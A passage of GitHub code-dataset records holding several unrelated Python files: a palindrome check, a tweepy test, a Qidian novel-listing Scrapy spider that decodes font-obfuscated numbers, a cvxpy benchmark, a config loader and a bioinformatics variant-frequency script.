\"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n div = 1\n \n while x//div >= 10:\n div *= 10\n \n while x != 0:\n l = x // div\n r = x % 10\n if l != r:\n return False\n \n x = (x % div) // 10\n div //= 100\n \n return True\n\n\nclass Solution:\n \"\"\" No extra space, but possible integer overflow \"\"\"\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0:\n return False\n \n copy, reverse = x, 0\n \n while copy:\n reverse *= 10\n reverse += copy % 10\n copy //= 10\n print(reverse)\n \n return x == reverse\n","repo_name":"chasezimmy/fun","sub_path":"palindrome_number.py","file_name":"palindrome_number.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19028048137","text":"import time\n\nimport unittest\nimport tweepy\n\nfrom constants import *\nfrom main import get_tweet_type_from_text, TweetType, get_user_mentions\n\nclass TestTweetType(unittest.TestCase):\n def setUp(self):\n self.rt_type = \"RT @ubervu: RT @ggerik: Critical for global ...\"\n self.rt_type_id = 424644245992255488\n self.ct_type = \"@anpetre haha, you should ...\"\n self.ct_type_id = 424670463852568576\n self.ot_type = \"tweeting 11 @TED_TALKS link so I don't ...\"\n self.ot_type_id = 400009508526632960\n\n def get_api(self):\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n return api\n\n def test_tweet_type_text(self):\n self.assertEqual(TweetType.OT, get_tweet_type_from_text(self.ot_type))\n self.assertEqual(TweetType.CT, get_tweet_type_from_text(self.ct_type))\n self.assertEqual(TweetType.RT, get_tweet_type_from_text(self.rt_type))\n\n def test_get_user_mentions(self):\n api = self.get_api()\n # RT verify mentions\n tweet = api.get_status(self.rt_type_id)\n tweet_type = get_tweet_type_from_text(tweet['text'])\n self.assertEqual(['ggerik'], get_user_mentions(tweet, tweet_type))\n # CT verify mentions\n tweet = api.get_status(self.ct_type_id)\n tweet_type = get_tweet_type_from_text(tweet['text'])\n self.assertEqual([], get_user_mentions(tweet, tweet_type))\n # OT verify mentions\n tweet = api.get_status(self.ot_type_id)\n tweet_type = get_tweet_type_from_text(tweet['text'])\n self.assertEqual(['TED_TALKS'], get_user_mentions(tweet, tweet_type))\n","repo_name":"andreip/twitter-authorities","sub_path":"tests/test_tweet_type.py","file_name":"test_tweet_type.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"41201459899","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Spider,Request\nfrom qidianscrapy.items import QidianscrapyItem\nfrom pyquery import PyQuery as pq\nfrom io import BytesIO\nfrom fontTools.ttLib import TTFont\nimport requests\nimport re\nfrom lxml import etree\n\nclass QidianSpider(scrapy.Spider):\n name = 'qidian'\n allowed_domains = ['www.qidian.com']\n def __init__(self):\n self.start_url = 'https://www.qidian.com/all?%27'\n self.cmap = self.get_font('https://www.qidian.com/all?chanId=21&orderId=&page=1&style=1&pageSize=20&siteid=1&pubflag=0&hiddenField=0')\n self.urls = self.getUrl(self.start_url)\n\n def get_font(self,Pageurl):\n response = requests.get(Pageurl).text\n doc = pq(response)\n # 获取当前字体文件名称\n fonturl = doc('p.update > span > style').text()\n url = re.search('woff.*?url.*?\\'(.+?)\\'.*?truetype', fonturl).group(1)\n response = requests.get(url)\n font = TTFont(BytesIO(response.content))\n cmap = font.getBestCmap()\n font.close()\n return cmap\n\n def getUrl(self,start_url):\n urlList = []\n response = etree.HTML(requests.get(start_url).text)\n # choose mian classify\n first_item = response.xpath('/html/body/div[1]/div[5]/div[1]/div[3]/div[1]/ul//li/a/@href')\n # average 4 select 1\n for url in first_item[1::4]:\n targetUrl = 'https:' + url\n val = etree.HTML(requests.get(targetUrl).text)\n urlList.extend(val.xpath('/html/body/div[1]/div[5]/div[1]/div[3]/div[1]/div/dl//@href'))\n return urlList\n\n def get_encode(self,cmap,values):\n WORD_MAP = {'zero': '0', 'one': '1', 'two': '2', 'three': '3', 'four': '4', 'five': '5', 'six': '6',\n 'seven': '7', 'eight': '8', 'nine': '9', 'period': '.'}\n word_count = ''\n for value in values.split(';'):\n value = value[2:]\n key = cmap[int(value)]\n word_count += WORD_MAP[key]\n return word_count\n\n def start_requests(self):\n for url in self.urls:\n url = 'https:'+url\n # page number\n for i in range(1,5):\n url = url.replace(str(i),str(i+1))\n yield Request(url,self.parse)\n\n def parse(self, response):\n doc = pq(response.text)\n # 获取当前字体文件名称\n classattr = doc('p.update > span > span').attr('class')\n pattern = '(.*?)' % classattr\n # 获取当前页面所有被字数字符\n numberlist = re.findall(pattern, response.text)\n try:\n quotes = response.xpath('/html/body/div[1]/div[5]/div[2]/div[2]/div/ul/li/div[2]')\n except:\n print('Xpath 1 change, please check')\n i=0\n for quote in quotes:\n item = QidianscrapyItem()\n item['Title'] = quote.xpath('h4/a/text()').extract_first()\n item['Author'] = quote.xpath('p[1]/a[1]/text()').extract_first()\n item['Url'] = 'https:'+quote.xpath('h4/a/@href').extract_first()\n item['FictionClass1'] = quote.xpath('p[1]/a[2]/text()').extract_first()\n item['FictionClass2'] = quote.xpath('p[1]/a[3]/text()').extract_first()\n item['State'] = quote.xpath('p[1]/span/text()').extract_first()\n item['Content'] = quote.xpath('p[2]/text()').extract_first().strip()\n try:\n item['Number'] = self.get_encode(self.cmap,numberlist[i][:-1])\n except KeyError:\n self.cmap = self.get_font(response.url)\n item['Number'] = self.get_encode(self.cmap, numberlist[i][:-1])\n i+=1\n yield item\n","repo_name":"GuanLdong/QidianScrapy","sub_path":"qidianscrapy/spiders/qidian.py","file_name":"qidian.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"11113438503","text":"import cvxpy as cp\nimport numpy as np\n\n\nclass SVMWithL1Regularization:\n \"\"\"\n Taken from https://stanford.edu/~boyd/papers/cvx_short_course.html\n \"\"\"\n\n def setup(self):\n np.random.seed(1)\n n = 500\n m = 25000\n DENSITY = 0.2\n beta_true = np.random.randn(n, 1)\n idxs = np.random.choice(range(n), int((1 - DENSITY) * n), replace=False)\n for idx in idxs:\n beta_true[idx] = 0\n\n offset = 0\n sigma = 45\n X = np.random.normal(0, 5, size=(m, n))\n Y = np.sign(X.dot(beta_true) + offset + np.random.normal(0, sigma, size=(m, 1)))\n\n # Solve optimization problem\n beta = cp.Variable((n, 1))\n v = cp.Variable()\n loss = cp.sum(cp.pos(1 - cp.multiply(Y, X @ beta - v)))\n reg = cp.norm(beta, 1)\n lambd = cp.Parameter(nonneg=True)\n objective = cp.Minimize(loss / m + lambd * reg)\n problem = cp.Problem(objective)\n self.problem = problem\n\n def time_compile_problem(self):\n self.problem.get_problem_data(solver=cp.SCS)\n\n\nif __name__ == '__main__':\n svm_l1 = SVMWithL1Regularization()\n svm_l1.setup()\n svm_l1.time_compile_problem()\n","repo_name":"cvxpy/benchmarks","sub_path":"benchmark/svm_l1_regularization.py","file_name":"svm_l1_regularization.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} +{"seq_id":"31565613501","text":"from matplotlib import colors\nimport toml\n\n\n# \"#969696\"\ndef hex_to_rgb_percent(hex_str):\n rgb_pct_color = colors.hex2color(hex_str)\n return rgb_pct_color\n\n\n# \"255 255 255\"\ndef rgb_to_percent(rgb_list):\n hex_color = f'#{rgb_list[0]:02x}{rgb_list[1]:02x}{rgb_list[2]:02x}'\n # hex_1 = '#%02x%02x%02x' % (rgb_0[0], rgb_0[1], rgb_0[2])\n rgb_pct_color = colors.hex2color(hex_color)\n return rgb_pct_color\n \n \nclass ConfigLoader():\n \n inst = None\n\n def __new__(cls, file_color=None, file_user=None, file_bili=None, file_ip=None):\n if not cls.inst:\n cls.inst = super(ConfigLoader, cls).__new__(cls)\n cls.inst.file_color = file_color\n # cls.inst.dict_color = cls.inst.read_color()\n # print(cls.inst.dict_color)\n \n cls.inst.file_user = file_user\n # cls.inst.dict_user = cls.inst.read_user()\n # print(cls.inst.dict_user)\n \n cls.inst.file_bili = file_bili\n # cls.inst.dict_bili = cls.inst.read_bili()\n # print(cls.inst.dict_bili)\n # print(\"# 初始化完成\")\n \n cls.inst.file_ip = file_ip\n # cls.inst.dict_ip = cls.inst.read_ip()\n # print(cls.inst.dict_ip)\n return cls.inst\n \n def write_user(self, dict_new, user_id):\n with open(self.file_user, encoding=\"utf-8\") as f:\n dict_user = toml.load(f)\n for i, value in dict_new.items():\n dict_user['users'][user_id][i] = value\n with open(self.file_user, 'w', encoding=\"utf-8\") as f:\n toml.dump(dict_user, f)\n \n def read_bili(self):\n with open(self.file_bili, encoding=\"utf-8\") as f:\n dict_bili = toml.load(f)\n return dict_bili\n \n def read_ip(self):\n with open(self.file_ip, encoding=\"utf-8\") as f:\n dict_ip = toml.load(f)\n return dict_ip\n \n def read_color(self):\n with open(self.file_color, encoding=\"utf-8\") as f:\n dict_color = toml.load(f)\n for i in dict_color.values():\n for j in i.keys():\n if isinstance(i[j], str):\n i[j] = hex_to_rgb_percent(i[j])\n else:\n i[j] = rgb_to_percent(i[j])\n \n return dict_color\n \n def read_user(self):\n with open(self.file_user, encoding=\"utf-8\") as f:\n dict_user = toml.load(f)\n return dict_user\n \n \n \n\n","repo_name":"rabbit2rabbit/bili2.0","sub_path":"config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29621811426","text":"\r\n#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys,os\r\nfrom optparse import OptionParser\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\n\r\n\r\n\r\ndef iSNV_SNP_tableRead(iSNV_SNP_table):\r\n\tiSNVSNPtablels = open(iSNV_SNP_table,'r').readlines()\r\n\tHeaderLs = iSNVSNPtablels[0].split(\"\\n\")[0].split(\"\\t\")\r\n\tHeaderL = []\r\n\tfor HeaderID in HeaderLs:\r\n\t\tif HeaderID != \"#Posi\" and HeaderID != \"snv/SNP\":\r\n\t\t\t\r\n\t\t\tHeaderL.append(HeaderID.split(\".sort\")[0])\r\n\t\telse:\r\n\t\t\tHeaderL.append(HeaderID)\r\n\tlie = 0\r\n\tlieD = {}\r\n\tfor Header in HeaderL:\r\n\t\tlieD[Header] = lie\r\n\t\tlie += 1\r\n\tlsD = {}\r\n\tfor iSNVSNPtablel in iSNVSNPtablels:\r\n\t\tif \"#\" not in iSNVSNPtablel and iSNVSNPtablel != \"\\n\" :\r\n\t\t\tlL = iSNVSNPtablel.split(\"\\n\")[0].split(\"\\t\")\r\n\t\t\tPos = int(lL[0])\r\n\t\t\tlsD[Pos] = lL\r\n\treturn lieD,lsD\r\n\r\n\r\n\r\ndef samp_Freq_Dic(samples,lieD,lsD):\r\n\tsamp_FreqDic = {}\r\n\tsampNA_PosiDic = {}\r\n\tprint(lieD)\r\n\tfor sample in samples:\r\n\t\tLie = lieD[sample]\r\n\t\tsamp_FreqDic[sample] = {}\r\n\t\tsampNA_PosiDic[sample] = []\r\n\t\tfor Posi in lsD:\r\n\t\t\tFreq = lsD[Posi][Lie]\r\n\t\t\tif Freq != \"NA\" :\r\n\t\t\t\tif Freq != \"NO\":\t\t\t\t\r\n\t\t\t\t\tFreq = float(lsD[Posi][Lie])\r\n\t\t\t\t\tif Freq >= 0.02:\r\n\t\t\t\t\t\tsamp_FreqDic[sample][Posi] = Freq\r\n\t\t\t\telse:\r\n\t\t\t\t\tFreq = 0\r\n\t\t\telse:\r\n\t\t\t\tsampNA_PosiDic[sample].append(Posi)\r\n\t#print(samp_FreqDic.keys())\r\n\treturn samp_FreqDic,sampNA_PosiDic\r\n\r\n\r\n\r\ndef Person_NA_Posi(samples,sampNA_PosiDic):\r\n\tpersonNAPosi = {}\r\n\tfor sample in samples:\r\n\t\tsampleNAPosi = sampNA_PosiDic[sample]\r\n\t\tfor posi in sampleNAPosi:\r\n\t\t\tif posi not in personNAPosi:\r\n\t\t\t\tpersonNAPosi[posi] = ''\r\n\treturn personNAPosi\r\n\r\n\r\ndef Person_commonSNP_Posi(samples,samp_FreqDic,lsD):\r\n\tpersonCommonPosi = {}\r\n\tfor posi in lsD.keys():\r\n\t\tcount = 0\r\n\t\tfor sample in samples:\r\n\t\t\tsampleFreqDic = samp_FreqDic[sample]\r\n\t\t\tif posi in sampleFreqDic:\r\n\t\t\t\tFREQ = sampleFreqDic[posi]\r\n\t\t\t\tif FREQ >= snv_MaxFreq:\r\n\t\t\t\t\tcount += 1\r\n\t\tif count == len(samples):\r\n\t\t\tpersonCommonPosi[posi] = ''\t\r\n\treturn personCommonPosi\r\n\r\n\r\n\r\n\r\ndef readInfo(InfoF,person):\r\n\tprint(person)\r\n\tcladeSampDic = {}\r\n\tfor InfoFl in open(InfoF).readlines():\r\n\t\tif \"#\" not in InfoFl:\r\n\t\t\tInfoFl_Tags = InfoFl.split(\"\\n\")[0].split(\"\\t\")\r\n\t\t\tseqID = InfoFl_Tags[18]\r\n\t\t\tclade = InfoFl_Tags[20]\r\n\t\t\tif seqID not in [\"P1-S1\",\"P1-S2\",\"P1-S3\",\"P2-S1\",\"P5-S17\",\"P7-S3\"]:\t\r\n\t\t\t\tif person in clade:\r\n\t\t\t\t\tif clade not in cladeSampDic:\r\n\t\t\t\t\t\tcladeSampDic[clade] = []\r\n\t\t\t\t\tcladeSampDic[clade].append(seqID)\r\n\treturn cladeSampDic\r\n\r\n\r\n\r\n\r\n\r\ndef tongjiFREQ(sample,samp_FreqDic,personNAPosi,personCommonPosi,FiltPosiDic,repeatRegPosi):\r\n\tSampsnv_Lst = {}\r\n\tSampSNP_Lst = {}\r\n\tFreqDic = samp_FreqDic[sample]\r\n\ttongji_Dic = {}\r\n\r\n\tsnvCount,SNPCount = 0,0\r\n\tprint(list(FreqDic.keys())[0:10])\r\n\tfor Posi in FreqDic:\r\n\t\tif (Posi not in personNAPosi) and (Posi not in personCommonPosi) and (Posi not in FiltPosiDic) and (Posi not in repeatRegPosi):\r\n\t\t\tFreq = FreqDic[Posi]\r\n\t\t\tif Freq >= snv_MinFreq and Freq < snv_MaxFreq:\r\n\t\t\t\tsnvCount += 1\r\n\t\t\t\tSampsnv_Lst[Posi] = ''\r\n\r\n\t\t\telif Freq >= snv_MaxFreq :\r\n\t\t\t\tSNPCount += 1\r\n\t\t\t\tSampSNP_Lst[Posi] = ''\r\n\treturn Sampsnv_Lst,SampSNP_Lst\r\n\r\n\r\n\r\n\r\ndef readSnpEffF(sample,sampleSnpEffP,Sampsnv_Lst,SampSNP_Lst,CladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic):\r\n\t#PosiGeneDic = {}\r\n\tsnpeffGeneDic = {}\r\n\tEffDic = {}\r\n\tCladeSNV_snpeffGeneDic[sample] = {}\r\n\tCladeSNP_snpeffGeneDic[sample] = {}\r\n\tallFreqDic[sample] = {}\r\n\r\n\tSNV_intraGeneNum = 0\r\n\tSNV_interGeneNum = 0\r\n\tSNP_intraGeneNum = 0\r\n\tSNP_interGeneNum = 0\r\n\r\n\tFreqDic = {}\t\r\n\tsampleSnpEffF = sampleSnpEffP + \"/\" + sample + \".sort.rmdup.mpileup.minFreq0.05.snpeff.vcf\"\r\n\tfor sampleSnpEffFl in open(sampleSnpEffF).readlines():\r\n\t\tif \"#\" not in sampleSnpEffFl and sampleSnpEffFl != \"\\n\":\r\n\t\t\tsampleSnpEffFl_Tags = sampleSnpEffFl.split(\"\\n\")[0].split(\"\\t\")\r\n\t\t\tPosi = int(sampleSnpEffFl_Tags[1])\r\n\t\t\tInfos = sampleSnpEffFl_Tags[7].split(\";\")\r\n\t\t\t\r\n\t\t\tif len(Infos) >5:\r\n\t\t\t\tAnn = Infos[5].split(\",\")[0].split(\"|\")\r\n\t\t\t\tGene = Ann[3]\t\t\t\t\r\n\t\t\t\tEff = Ann[1]\r\n\t\t\t\tEffDic[Posi] = Eff\r\n\t\t\t\tif Eff != \"upstream_gene_variant\" and Eff != \"downstream_gene_variant\":\r\n\t\t\t\t\tsnpeffGeneDic[Posi] = Gene\r\n\t\t\t\t\tPosiGeneDic[Posi] = Gene\r\n\t\t\t\telse:\r\n\t\t\t\t\tif Posi in Sampsnv_Lst:\r\n\t\t\t\t\t\tSNV_interGeneNum += 1\r\n\t\t\t\t\telif Posi in SampSNP_Lst:\r\n\t\t\t\t\t\tSNP_interGeneNum += 1\r\n\t\t\t\t#1/1:255:355:0:355:100.0%\r\n\t\t\t\t\r\n\t\t\t\tFreqInfo= sampleSnpEffFl_Tags[9]\r\n\t\t\t\tFreq = float(FreqInfo.split(\":\")[5].split(\"%\")[0])\r\n\t\t\t\t\r\n\r\n\t\t\t\tFreqDic[Posi] = Freq\r\n\r\n\r\n\r\n\tsnvSnpEffStatDic = {}\r\n\tSNPSnpEffStatDic = {}\r\n\r\n\r\n\r\n\tSNV_syn_Num,SNV_Nonsyn_Num,SNP_syn_Num,SNP_Nonsyn_Num = 0,0,0,0\r\n\r\n\tEff_Stat_Dic = {}\r\n\r\n\r\n\tfor Posi in snpeffGeneDic:\r\n\t\tGENE = snpeffGeneDic[Posi]\r\n\t\tEff = EffDic[Posi]\r\n\r\n\r\n\t\tif Posi in Sampsnv_Lst:\r\n\t\t\tif GENE not in snvSnpEffStatDic:\r\n\t\t\t\tsnvSnpEffStatDic[GENE] = 0\r\n\t\t\tsnvSnpEffStatDic[GENE] += 1\r\n\r\n\t\t\r\n\t\t\tif Eff != \"upstream_gene_variant\" and Eff != \"downstream_gene_variant\":\r\n\t\t\t\tSNV_intraGeneNum += 1\r\n\t\t\t\tif Eff == \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNV_syn\"\r\n\t\t\t\t\tSNV_syn_Num += 1\r\n\t\t\t\t\tEff_Flag = \"iSNV_Syn\"\r\n\t\t\t\telif Eff != \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNV_nonsyn\"\r\n\t\t\t\t\tSNV_Nonsyn_Num += 1\r\n\t\t\t\t\tEff_Flag = \"iSNV_Miss\"\r\n\t\t\t\t\tif Eff != \"missense_variant\":\r\n\t\t\t\t\t\tEff_Flag = \"iSNV_nonCoding\"\r\n\r\n\t\t\t\tif GENE not in Eff_Stat_Dic:\r\n\t\t\t\t\tEff_Stat_Dic[GENE] = {}\r\n\t\t\t\tif Flag not in Eff_Stat_Dic[GENE]:\r\n\t\t\t\t\tEff_Stat_Dic[GENE][Flag] = 0\r\n\t\t\t\tEff_Stat_Dic[GENE][Flag] += 1\r\n\r\n\t\t\t\tallFreqDic[sample][Posi] = {}\r\n\t\t\t\tallFreqDic[sample][Posi][Eff_Flag] = FreqDic[Posi]\r\n\r\n\r\n\r\n\r\n\t\telif Posi in SampSNP_Lst:\r\n\t\t\tif GENE not in SNPSnpEffStatDic:\r\n\t\t\t\tSNPSnpEffStatDic[GENE] = 0\r\n\t\t\tSNPSnpEffStatDic[GENE] += 1\r\n\r\n\t\t\tif Eff != \"upstream_gene_variant\" and Eff != \"downstream_gene_variant\":\r\n\t\t\t\tSNP_intraGeneNum += 1\r\n\t\t\t\tif Eff == \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNP_syn\"\r\n\t\t\t\t\tSNP_syn_Num += 1\r\n\t\t\t\telif Eff != \"synonymous_variant\":\r\n\t\t\t\t\tFlag = \"SNP_nonsyn\"\r\n\t\t\t\t\tSNP_Nonsyn_Num += 1\r\n\t\t\t\t\r\n\t\t\t\tif GENE not in Eff_Stat_Dic:\r\n\t\t\t\t\tEff_Stat_Dic[GENE] = {}\r\n\t\t\t\tif Flag not in Eff_Stat_Dic[GENE]:\r\n\t\t\t\t\tEff_Stat_Dic[GENE][Flag] = 0\r\n\t\t\t\tEff_Stat_Dic[GENE][Flag] += 1\r\n\r\n\r\n\r\n\r\n\t#snv_interNumDic[sample] = [SNV_intraGeneNum,SNV_interGeneNum,SNP_intraGeneNum,SNP_interGeneNum,SNV_syn_Num,SNV_Nonsyn_Num,SNP_syn_Num,SNP_Nonsyn_Num]\r\n\tallEff_Stat_Dic[sample] = Eff_Stat_Dic\r\n\tCladeSNV_snpeffGeneDic[sample] = snvSnpEffStatDic\r\n\tCladeSNP_snpeffGeneDic[sample] = SNPSnpEffStatDic\r\n\r\n\r\n\r\n\treturn CladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic\r\n\r\n\r\n\r\ndef FiltEcoliPosi(FiltEcoliPosiF):\r\n\tFiltPosiDic = {}\r\n\tfor FiltEcoliPosiFl in open(FiltEcoliPosiF).readlines():\r\n\t\tif FiltEcoliPosiFl != \"\\n\":\r\n\t\t\tFiltPosiDic[FiltEcoliPosiFl.split(\"\\n\")[0].split(\"\\t\")[0]] = ''\r\n\r\n\treturn FiltPosiDic\r\n\r\n\r\n\r\ndef FiltRefRepeatRegions1(RepeatMaskedGnm):\r\n\tfor RepeatMaskedGnml in open(RepeatMaskedGnm).readlines():\r\n\t\tif \">\" in RepeatMaskedGnml:\r\n\t\t\tgnm = ''\r\n\t\telse:\r\n\t\t\tgnm += RepeatMaskedGnml.split(\"\\n\")[0]\r\n\trepeatRegPosi={}\r\n\tfor gnmPosiIndex in range(0,len(gnm)):\r\n\t\tif gnm[gnmPosiIndex] == \"N\":\r\n\t\t\trepeatRegPosi[gnmPosiIndex+1] = ''\r\n\treturn repeatRegPosi\r\n\r\n\r\ndef FiltRefRepeatRegions(RepeatPosiF):\r\n\trepeatRegPosi = {}\r\n\tfor RepeatPosiFl in open(RepeatPosiF).readlines():\r\n\t\trepeatRegPosi[int(RepeatPosiFl.split(\"\\t\")[0])] = ''\r\n\treturn repeatRegPosi\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n\tperson = iSNV_SNP_table.split(\"/\")[-2]\r\n\tif person == \"P5_withP2\":\r\n\t\tperson = \"P5\"\r\n\tlieD,lsD = iSNV_SNP_tableRead(iSNV_SNP_table)\r\n\r\n\tFiltPosiDic = FiltEcoliPosi(FiltEcoliPosiF)\r\n\trepeatRegPosi = FiltRefRepeatRegions(RepeatMaskedGnm)\r\n\r\n\tprint(len(repeatRegPosi))\r\n\tprint(list(repeatRegPosi.keys())[0:10])\r\n\tprint(list(lsD.keys())[0:10])\r\n\tprint(\"hhhhh\")\r\n\tcladeSampDic = readInfo(InfoF,person)\r\n\tsampleSnpEffP = snpEffPath\r\n\t#print(person)\r\n\t#print(cladeSampDic)\r\n\tFiltSamps = [\"P1-S1\",\"P1-S2\",\"P1-S3\",\"P2-S1\",\"P5-S17\",\"P7-S3\"]\r\n\t\r\n\r\n\tfor clade in cladeSampDic:\r\n\t\t#print(clade)\r\n\t\tcladeSamples = cladeSampDic[clade]\r\n\t\t\r\n\t\tcladeSamps = []\r\n\t\tfor cladeSample in cladeSamples:\r\n\t\t\tfor lieSamp in lieD:\r\n\t\t\t\tif lieSamp != \"#Posi\" and lieSamp != \"snv/SNP\" and cladeSample == lieSamp:\r\n\t\t\t\t\tcladeSamps.append(lieSamp)\r\n\r\n\t\tcladeSamps.sort()\r\n\t\t#print(cladeSamps)\r\n\t\tsamp_FreqDic,sampNA_PosiDic = samp_Freq_Dic(cladeSamps,lieD,lsD)\r\n\t\tpersonNAPosi = Person_NA_Posi(cladeSamps,sampNA_PosiDic)\r\n\t\tpersonCommonPosi = Person_commonSNP_Posi(cladeSamps,samp_FreqDic,lsD)\r\n\r\n\t\tCladeSNV_snpeffGeneDic = {}\r\n\t\tCladeSNP_snpeffGeneDic = {}\r\n\t\tsnv_interNumDic = {}\r\n\t\tallEff_Stat_Dic = {}\r\n\t\tallFreqDic = {}\r\n\t\tPosiGeneDic ={}\r\n\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tSampsnv_Lst,SampSNP_Lst = tongjiFREQ(sample,samp_FreqDic,personNAPosi,personCommonPosi,FiltPosiDic,repeatRegPosi)\t\t\r\n\t\t\t#print(Sampsnv_Lst[\"42319\"])\r\n\t\t\tCladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic = readSnpEffF(sample,sampleSnpEffP,Sampsnv_Lst,SampSNP_Lst,CladeSNV_snpeffGeneDic,CladeSNP_snpeffGeneDic,snv_interNumDic,allEff_Stat_Dic,allFreqDic,PosiGeneDic)\r\n\r\n\r\n\r\n\t\t#print(PosiGeneDic)\r\n\r\n\r\n##out SNV Eff Freq of each posi in each clade\r\n\t\tprint(\"out SNV Eff Freq\")\r\n\t\tHeader = \"\\t\".join([\"Sample\",\"posi\",\"Flag\",\"Freq\"])\r\n\t\toutlines = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in allFreqDic[sample][Posi]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\":\r\n\t\t\t \t \t\tline = \"\\t\".join([sample,str(Posi),Eff_Flag,str(allFreqDic[sample][Posi][Eff_Flag])])\r\n\t\t\t \t \t\toutlines.append(line)\r\n\t\tout = \"\\n\".join(outlines)\r\n\r\n\r\n\t\tout_SNVFreq_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".Eff_Freq.txt\"\r\n\t\tif ( os.path.exists(out_SNVFreq_F)):\r\n\t\t\tos.remove(out_SNVFreq_F)\r\n\t\tout_SNP_F_O=open(out_SNVFreq_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n##out SNV Eff Freq of each gene in each clade\r\n\t\tGeneNumCount = {}\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in allFreqDic[sample][Posi]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\":\r\n\t\t\t \t\t\tgeneID = PosiGeneDic[Posi]\r\n\t\t\t \t\t\tif geneID not in GeneNumCount :\r\n\t\t\t \t\t\t\tGeneNumCount[geneID] = 0\r\n\t\t\t \t\t\tGeneNumCount[geneID] += 1\r\n\t\t\t \t \t\t\r\n\r\n\r\n\t\tprint(\"out SNV Eff Freq\")\r\n\t\tHeader = \"\\t\".join([\"Gene\",\"posi\",\"Flag\",\"Freq\"])\r\n\t\toutlines = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in allFreqDic[sample][Posi]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\" and GeneNumCount[PosiGeneDic[Posi]] >= 3*len(cladeSamps) :\r\n\t\t\t \t \t\tline = \"\\t\".join([PosiGeneDic[Posi],str(Posi),Eff_Flag,str(allFreqDic[sample][Posi][Eff_Flag])])\r\n\t\t\t \t \t\toutlines.append(line)\r\n\t\tout = \"\\n\".join(outlines)\r\n\r\n\r\n\t\tout_SNVFreq_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".gene.Eff_Freq.txt\"\r\n\t\tif ( os.path.exists(out_SNVFreq_F)):\r\n\t\t\tos.remove(out_SNVFreq_F)\r\n\t\tout_SNP_F_O=open(out_SNVFreq_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n\r\n\r\n### out\r\n\t\t##person SNV snpeff Gene Stat\r\n\t\tPersonSNV_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in CladeSNV_snpeffGeneDic[sample]:\r\n\t\t\t\t#if CladeSNV_snpeffGeneDic[sample][Gene] > 1 and Gene not in PersonSNV_geneLst:\r\n\t\t\t\tif Gene not in PersonSNV_geneLst:\r\n\t\t\t\t\tPersonSNV_geneLst.append(Gene)\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in PersonSNV_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in CladeSNV_snpeffGeneDic[sample]:\r\n\t\t\t\t\tNum = CladeSNV_snpeffGeneDic[sample][Gene]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\tif int(allNum) >= int(3 * len(cladeSamps)):\r\n\t\t\t\tlinesLst.append(line)\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\r\n\t\toutHeader = [\"gene\"]\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutHeader.append(sample)\r\n\t\toutHeader.append(\"SumNum\")\r\n\t\tHeader = \"\\t\".join(outHeader)\r\n\r\n\r\n\t\tout_SNV_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + 